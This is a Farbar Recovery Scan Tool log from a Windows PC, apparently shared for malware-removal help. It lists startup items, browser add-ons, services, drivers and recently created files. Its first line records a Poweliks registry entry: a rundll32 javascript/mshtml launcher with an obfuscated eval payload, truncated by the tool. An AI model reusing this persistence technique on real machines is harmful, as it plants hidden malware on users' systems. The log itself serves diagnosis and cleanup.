HKU\S-1-5-21-462157724-132793273-1689201830-1165\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Authentication Packages] msv1_0 wvauth
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Call Manager.lnk
ShortcutTarget: Call Manager.lnk -> C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe (Toshiba America Information Systems, Inc.)
Startup: C:\Users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Reminder.lnk
ShortcutTarget: Reminder.lnk -> G:\CheckIn\Chklogin.exe ()
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13-comm.msn.com
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 10.0.0.2

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\mike\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-08-14]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-11]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 CmRegService; C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [12288 2014-01-14] (Toshiba America Information Systems, Inc.) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [40888 2013-02-14] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1020304 2013-02-14] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [218504 2012-01-17] ()
S3 ESHASRV; C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [190208 2013-02-14] (ESET)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AC_Service.exe [309568 2014-07-10] (Citrix Online, a division of Citrix Systems, Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166432 2012-10-22] (Intel Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2012-02-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2012-02-08] (Hewlett-Packard) [File not signed]
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [206400 2006-12-21] (SafeNet, Inc)
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1679872 2012-01-05] (Wave Systems Corp.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [198144 2012-01-16] (Wave Systems Corp.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [217000 2013-02-04] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [183016 2013-04-09] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [153200 2013-02-04] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [141304 2013-02-04] (ESET)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [3708776 2012-02-07] (Realtek Semiconductor Corp.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 14:19 - 2014-08-28 14:19 - 00015266 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:18 - 2014-08-28 14:19 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 13:58 - 2014-08-28 14:01 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 13:58 - 2014-08-28 14:00 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 15:04 - 2014-08-27 15:09 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:54 - 2014-08-28 13:51 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-27 14:54 - 2014-08-27 14:55 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:51 - 2014-08-27 14:27 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:21 - 2014-08-27 13:29 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:06 - 2014-08-27 13:07 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:03 - 2014-08-27 13:20 - 00000000 ____D () C:\temp
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 11:50 - 2014-08-27 12:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-27 11:50 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-27 11:50 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:36 - 2014-08-21 09:37 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-06-04 06:59 - 00041472 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\agphlink.tsp
2014-08-21 09:36 - 2013-06-04 06:58 - 00220672 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\intrtspi.tsp
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:35 - 2013-10-16 09:08 - 00131155 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\gtapiocx.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00081920 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DumpWin.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00069632 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\playrec.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00061440 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\CTSMail.dll
2014-08-21 09:35 - 2013-10-16 09:08 - 00040960 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DDEWrap.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00127037 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\eClient.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00053306 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\sock.ocx
2014-08-21 09:35 - 2011-11-16 07:59 - 00000408 _____ () C:\Windows\SysWOW64\eClient.lic
2014-08-21 09:35 - 2009-11-05 08:20 - 00626688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr80.dll
2014-08-21 09:35 - 2009-11-05 08:20 - 00000414 _____ () C:\Windows\SysWOW64\gtapiocx.lic
2014-08-21 09:35 - 2006-03-13 14:28 - 00368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbar332.dll
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:33 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:32 - 2014-08-21 09:33 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-21 09:32 - 2014-02-07 03:01 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Microsoft Help
2014-08-21 09:32 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-21 09:32 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-06 03:04 - 2014-03-24 19:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-06 03:04 - 2014-03-24 19:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-06 03:03 - 2014-06-17 19:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2014-08-06 03:03 - 2014-06-17 18:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2014-08-06 03:03 - 2014-06-17 18:10 - 03157504 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-06 03:02 - 2014-06-06 03:10 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-08-06 03:02 - 2014-06-06 02:44 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-08-06 03:02 - 2014-05-29 23:45 - 00497152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-08-06 03:01 - 2014-06-06 19:42 - 02148352 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-06 03:01 - 2014-06-06 19:40 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-06 03:01 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-06 03:01 - 2014-03-04 02:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-08-06 03:01 - 2014-03-04 02:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-08-06 03:01 - 2014-03-04 02:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 18:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 17:59 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2014-08-06 03:00 - 2014-06-06 21:02 - 17854464 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-06 03:00 - 2014-06-06 20:13 - 10890752 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-06 03:00 - 2014-06-06 19:59 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-06 03:00 - 2014-06-06 19:52 - 01348608 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-06 03:00 - 2014-06-06 19:51 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 19:51 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-06 03:00 - 2014-06-06 19:50 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-06 03:00 - 2014-06-06 19:47 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 19:42 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 19:39 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-06 03:00 - 2014-06-06 19:35 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-06 03:00 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-06 03:00 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-06 03:00 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-06 03:00 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-06 03:00 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-06 03:00 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-08-06 03:00 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
